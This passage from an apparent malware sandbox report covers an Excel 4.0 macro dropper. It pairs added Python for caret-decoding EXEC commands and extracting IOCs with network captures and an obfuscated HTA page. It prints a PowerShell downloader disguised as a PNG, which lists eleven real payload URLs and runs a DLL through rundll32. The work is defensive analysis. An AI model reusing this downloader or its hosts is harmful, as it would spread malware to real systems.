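    "14,9,' Lose away off why half led have near bed."
    "20,9,=HALT()"
)

# Cells are concatenated with no separator. Each starts with "row,col," and
# its content begins with ' (text) or = (formula); the lookahead uses that
# to find where the next cell starts.
CELL_RE = re.compile(r"(\d+),(\d+),(.*?)(?=\d+,\d+,[=']|\Z)", re.S)
EXEC_RE = re.compile(r'^=EXEC\("((?:[^"]|"")*)"\)\s*$', re.I)
URL_RE = re.compile(r"https?://[^\s\"')]+", re.I)
# Executables worth flagging when they show up in a macro-launched command.
LOLBINS = {"cmd", "mshta", "powershell", "rundll32", "regsvr32", "certutil",
           "wscript", "cscript", "wmic", "bitsadmin"}


def parse_cells(dump: str) -> List[Tuple[int, int, str]]:
    """Split the flattened dump into (row, col, content) triples."""
    return [(int(r), int(c), body) for r, c, body in CELL_RE.findall(dump)]


def cmd_unescape(cmdline: str) -> str:
    """Apply cmd.exe caret handling: outside double quotes ^X becomes X
    (so ^^ becomes ^); inside a double-quoted segment the caret is literal.
    An escaped quote (^") does not open a quoted segment."""
    out: List[str] = []
    in_quotes = False
    i = 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes:
            if i + 1 < len(cmdline):
                out.append(cmdline[i + 1])
                i += 1
            # a trailing caret would escape the line break: nothing to emit
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def lolbins_in(cmdline: str) -> List[str]:
    """Return the tokens of a decoded command line that name a LOLBin."""
    found: List[str] = []
    for tok in cmdline.split():
        name = tok.rsplit("\\", 1)[-1].lower()
        stem = name[:-4] if name.endswith(".exe") else name
        if stem in LOLBINS:
            found.append(name)
    return found


def find_exec_commands(dump: str) -> List[Dict[str, object]]:
    """Locate EXEC() formulas in the dump and decode their command lines."""
    hits: List[Dict[str, object]] = []
    for row, col, content in parse_cells(dump):
        m = EXEC_RE.match(content)
        if not m:
            continue
        raw = m.group(1).replace('""', '"')  # Excel doubles quotes inside strings
        decoded = cmd_unescape(raw)
        hits.append({
            "cell": f"R{row}C{col}",
            "raw": raw,
            "decoded": decoded,
            "urls": URL_RE.findall(decoded),
            "lolbins": lolbins_in(decoded),
        })
    return hits


if __name__ == "__main__":
    for hit in find_exec_commands(CELL_DUMP):
        print(hit["cell"], "->", hit["decoded"])
        print("  urls:", hit["urls"], " lolbins:", hit["lolbins"])
```

Run against the cell dump above, the EXEC cell decodes to `CMD.EXE /c mshta http://91.240.118.168/vvv/ppp/fe.html`, which is the same host the Snort alert and the first two connections in the network table below point at. The caret trick defeats plain string matching on the document bytes (no `mshta` or intact IP is present), so detection and IOC extraction should run on the cmd.exe-decoded form, not the raw formula.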
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/28/22-21:30:05.283601 | TCP | 2034631 | ET TROJAN Maldoc Activity (set) | 49166 | 80 | 192.168.2.22 | 91.240.118.168
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:29:59.612735987 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.673969984 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.674043894 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.674928904 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.736032009 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736197948 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736221075 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736242056 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736253977 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.736264944 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.736277103 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.736295938 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736316919 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736329079 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.736345053 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.736351967 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736371994 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736381054 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.736397028 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.736409903 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736426115 CET | 80 | 49165 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:29:59.736440897 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.736455917 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:29:59.757611990 CET | 49165 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:30:05.222527027 CET | 49166 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:30:05.281189919 CET | 80 | 49166 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:30:05.281279087 CET | 49166 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:30:05.283601046 CET | 49166 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:30:05.342128038 CET | 80 | 49166 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:30:05.342173100 CET | 80 | 49166 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:30:05.342190027 CET | 80 | 49166 | 91.240.118.168 | 192.168.2.22
Jan 28, 2022 21:30:05.342240095 CET | 49166 | 80 | 192.168.2.22 | 91.240.118.168
Jan 28, 2022 21:30:05.756164074 CET | 49167 | 80 | 192.168.2.22 | 139.59.58.214
Jan 28, 2022 21:30:06.070408106 CET | 80 | 49167 | 139.59.58.214 | 192.168.2.22
Jan 28, 2022 21:30:06.070489883 CET | 49167 | 80 | 192.168.2.22 | 139.59.58.214
Jan 28, 2022 21:30:06.070625067 CET | 49167 | 80 | 192.168.2.22 | 139.59.58.214
Jan 28, 2022 21:30:06.383723974 CET | 80 | 49167 | 139.59.58.214 | 192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391297102 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391338110 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391362906 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391386986 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391411066 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391434908 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391452074 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.391458988 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391485929 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391510963 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.391532898 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.393876076 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.393891096 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.393893957 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.587346077 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.704612017 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.704646111 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.704668045 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.704689980 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.704741955 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.706851959 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706880093 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706901073 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706902027 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.706923962 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706932068 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.706947088 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706969023 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.706979990 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.706993103 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707015991 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707025051 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.707039118 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707062006 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707071066 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.707083941 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707107067 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707114935 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.707134962 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707158089 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.707169056 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:06.900599003 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.900636911 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:06.900710106 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.017822981 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017885923 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017910004 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017930031 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017951012 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.017971039 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.018004894 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.018043041 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.020210981 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020242929 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020267963 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020289898 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020292997 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.020313025 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020325899 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.020334005 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020356894 CET8049167139.59.58.214192.168.2.22
                                                                          Jan 28, 2022 21:30:07.020370007 CET4916780192.168.2.22139.59.58.214
                                                                          Jan 28, 2022 21:30:07.020378113 CET8049167139.59.58.214192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 21:30:05.390374899 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 21:30:05.741262913 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 21:30:05.390374899 CET | 192.168.2.22 | 8.8.8.8 | 0x8286 | Standard query (0) | ayoobeducationaltrust.in | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 21:30:05.741262913 CET | 8.8.8.8 | 192.168.2.22 | 0x8286 | No error (0) | ayoobeducationaltrust.in | - | 139.59.58.214 | A (IP address) | IN (0x0001)
                                                                          • 91.240.118.168
                                                                          • ayoobeducationaltrust.in
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:29:59.674928904 CET | 0 | OUT | GET /vvv/ppp/fe.html HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US
                                                                          UA-CPU: AMD64
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: 91.240.118.168
                                                                          Connection: Keep-Alive
Jan 28, 2022 21:29:59.736197948 CET | 2 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 28 Jan 2022 20:29:59 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Content-Length: 10938
                                                                          Last-Modified: Thu, 27 Jan 2022 20:39:15 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "61f302f3-2aba"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 72 31 4c 34 68 32 57 34 4a 59 59 65 4a 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 62 57 78 36 4a 49 6f 77 77 6e 4f 73 68 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 62 57 78 36 4a 49 6f 77 77 6e 4f 73 68 5b 30 5d 3d 27 65 5c 31 30 36 5c 31 31 33 46 25 
33 34 25 33 36 43 25 33 31 27 20 20 20 3b 72 31 4c 34 68 32 57 34 4a 59 59 65 4a 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 25 7f 37 7f 36 7f 25 7f 36 7f 31 7d 18 7f 32 7f 25 7f 32 7f 30 7d 18 7f 31 7f 79 7f 25 7f 33 7f 37 7d 26 7f 44 7d 20 7d 28 7f 32 7d 28 7f 33 7f 42 7f 5c 5c 7f 31 7d 1c 7d 31 7f 37 7d 1d 7f 33 7f 38 7d 29 7d 31 7f 32 7f 33 7f 74 7d 1e 7f 69 7d 31 7f 35 7f 36 7d 31 7f 34 7d 2c 7f 45 7d 43 7f 36 7f 72 7d 1b 7f 46
                                                                          Data Ascii: <html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';r1L4h2W4JYYeJ=new Array();bWx6JIowwnOsh=new Array();bWx6JIowwnOsh[0]='e\106\113F%34%36C%31' ;r1L4h2W4JYYeJ[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'%76%61}2%20}1y%37}&D} }(2}(3B\\1}}17}38})}123t}i}156}14},E}C6r}F


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe
Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 21:30:05.283601046 CET | 12 | OUT | GET /vvv/ppp/fe.png HTTP/1.1
                                                                          Host: 91.240.118.168
                                                                          Connection: Keep-Alive
Jan 28, 2022 21:30:05.342173100 CET | 14 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 28 Jan 2022 20:30:05 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 1153
                                                                          Last-Modified: Thu, 27 Jan 2022 20:39:27 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "61f302ff-481"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 24 70 61 74 68 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 51 57 45 52 2e 64 6c 6c 22 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 61 79 6f 6f 62 65 64 75 63 61 74 69 6f 6e 61 6c 74 72 75 73 74 2e 69 6e 2f 63 6d 73 2f 4c 6d 4f 4f 65 44 6e 4e 6f 30 64 68 34 76 6b 4e 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6c 79 6e 73 6d 69 74 68 67 72 6f 75 70 2e 63 6f 6d 2f 68 66 74 6d 32 69 32 2f 4b 5a 49 46 77 6a 6d 77 57 49 31 73 79 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 63 75 72 76 79 67 69 72 6c 73 62 6f 75 74 69 71 75 65 2e 63 6f 6d 2f 6a 66 65 72 74 6c 2f 47 65 34 39 7a 63 49 7a 62 38 4b 57 77 58 46 46 6b 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 3a 2f 2f 74 68 65 73 6f 63 69 61 6c 61 67 65 6e 74 2e 6e 65 74 2f 62 2f 4d 4f 35 41 4b 71 4a 39 54 79 39 6c 45 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 62 61 77 65 6c 6e 69 61 6e 6b 61 2e 63 66 6f 6c 6b 73 2e 70 6c 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 54 74 76 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 74 65 73 74 2e 64 72 65 61 6d 63 69 74 79 6f 72 6c 61 6e 64 6f 2e 63 6f 6d 2f 74 30 6d 6d 78 2f 78 42 42 58 69 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 3a 2f 2f 68 75 63 75 6c 65 6b 2e 66 75 74 75 72 65 68 6f 73 74 2e 70 6c 2f 69 6d 61 67 65 73 2f 36 44 62 62 6d 6f 36 78 45 51 44 44 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 74 65 73 74 2e 76 61 6c 65 73 74 75 64 69 6f 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 61 50 76 57 37 41 70 4e 62 52 59 34 5a 47 50 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 3a 2f 2f 63 72 6d 2e 63 6f 6d 70 72 61 63 61 73 61 65 6e 68 6f 75 73 74 6f 6e 2e 63 6f 6d 2f 68 73 34 64 38 61 2f 63 30 73 31 33 49 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 3a 2f 2f 73 65 6c 6c 69 6e 2e 61 70 70 2f 77 70 2d 61 64 6d 69 6e 2f 53 32 63 44 50 59 58 4e 4b 
45 6e 54 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 63 6d 69 74 2e 76 61 6c 65 73 74 75 64 69 6f 73 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 52 75 65 47 4a 34 31 41 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20 20 20 24 77 65 62 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 24 75 72 6c 2c 20 24 70 61 74 68 29 3b 0d 0a 20 20 20 20 20 20 20 69 66 20 28 28 47 65 74 2d 49 74 65 6d 20 24 70 61 74 68 29 2e 4c 65 6e 67 74 68 20 2d 67 65 20 33 30 30 30 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 5b 44 69 61 67 6e 6f 73 74 69 63 73 2e 50 72 6f 63 65 73 73 5d 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 3b 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 7d 0d 0a 20 20 20 63 61 74 63 68 7b 7d 0d 0a 7d 20 0d 0a 53 6c 65 65 70 20 2d 73 20 34 3b 63 6d 64 20 2f 63 20 43 3a 5c 57 69 6e 64 6f 77 73 5c 53 79 73 57 6f 77 36 34 5c 72 75 6e 64 6c 6c 33 32 2e 65 78 65 20 27 43 3a
                                                                          Data Ascii: $path = "C:\ProgramData\QWER.dll";$url1 = 'http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/';$url2 = 'http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/';$url3 = 'http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/';$url4 = 'http://thesocialagent.net/b/MO5AKqJ9Ty9lE/';$url5 = 'http://bawelnianka.cfolks.pl/wp-content/Ttv/';$url6 = 'http://test.dreamcityorlando.com/t0mmx/xBBXi/';$url7 = 'http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/';$url8 = 'http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/';$url9 = 'http://crm.compracasaenhouston.com/hs4d8a/c0s13I/';$url10 = 'http://sellin.app/wp-admin/S2cDPYXNKEnT/';$url11 = 'http://cmit.valestudios.com/wp-admin/RueGJ41A/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break; } } catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:
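Session 1 is the security-relevant exchange in this capture: the server declares the body of /vvv/ppp/fe.png as image/png, but the bytes are a PowerShell downloader that tries eleven payload URLs in order and keeps the first file of at least 30000 bytes. Only the first URL (ayoobeducationaltrust.in) shows up in the traffic, so the other ten hosts would be missed by anyone who blocks just what the PCAP shows. The following Python is an added example and not part of the Joe Sandbox report: it checks a response body against the magic bytes its declared Content-Type implies, and, when the body is a text payload of this shape, pulls the drop path, URL list, hosts and size threshold out of it. The script text is transcribed from the Data Ascii line above and is truncated exactly where the report truncates it; the magic-byte table and the "$url ... DownloadFile" heuristic are this example's own assumptions.

```python
import re
from urllib.parse import urlparse

# Body of the fe.png response (HTTP session 1), transcribed from the report's
# Data Ascii line. The report cuts it off after "rundll32.exe 'C:", so the
# constructed input below is cut off there as well.
FE_PNG_BODY = r"""$path = "C:\ProgramData\QWER.dll";
$url1 = 'http://ayoobeducationaltrust.in/cms/LmOOeDnNo0dh4vkN/';
$url2 = 'http://lynsmithgroup.com/hftm2i2/KZIFwjmwWI1sy/';
$url3 = 'http://curvygirlsboutique.com/jfertl/Ge49zcIzb8KWwXFFk/';
$url4 = 'http://thesocialagent.net/b/MO5AKqJ9Ty9lE/';
$url5 = 'http://bawelnianka.cfolks.pl/wp-content/Ttv/';
$url6 = 'http://test.dreamcityorlando.com/t0mmx/xBBXi/';
$url7 = 'http://huculek.futurehost.pl/images/6Dbbmo6xEQDD/';
$url8 = 'http://test.valestudios.com/wp-content/aPvW7ApNbRY4ZGP/';
$url9 = 'http://crm.compracasaenhouston.com/hs4d8a/c0s13I/';
$url10 = 'http://sellin.app/wp-admin/S2cDPYXNKEnT/';
$url11 = 'http://cmit.valestudios.com/wp-admin/RueGJ41A/';
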